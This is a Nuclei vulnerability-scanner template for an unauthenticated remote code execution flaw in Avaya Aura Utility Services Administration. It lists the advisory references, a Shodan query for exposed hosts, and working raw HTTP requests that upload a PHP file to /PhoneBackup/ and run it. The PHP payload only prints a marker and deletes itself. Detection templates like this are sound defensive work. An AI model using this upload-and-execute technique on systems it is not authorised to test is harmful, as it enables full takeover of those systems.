id: avaya-aura-rce

info:
  name: Avaya Aura Utility Services Administration - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
    - https://download.avaya.com/css/public/documents/101076366
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"Avaya Aura"
  tags: rce,avaya,aura,iot,intrusive

http:
  - raw:
      - |
        PUT /PhoneBackup/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA
        Connection: close

        <?php print('avaya-aura-rce');unlink(__FILE__);
      - |
        GET /PhoneBackup/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA
        Connection: close

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 201"
          - 'contains(body_2, "avaya-aura-rce")'
        condition: and

# digest: 4a0a0047304502204b6948c6157a2da817d54e253c2ce2c58167b5b87a38f03ac93d249272392354022100d293de1cdfae89fefd07b6ab46f24104e913edda28824dd778d806d656bff5b0:922c64590222798bb761d5b6d8e72950
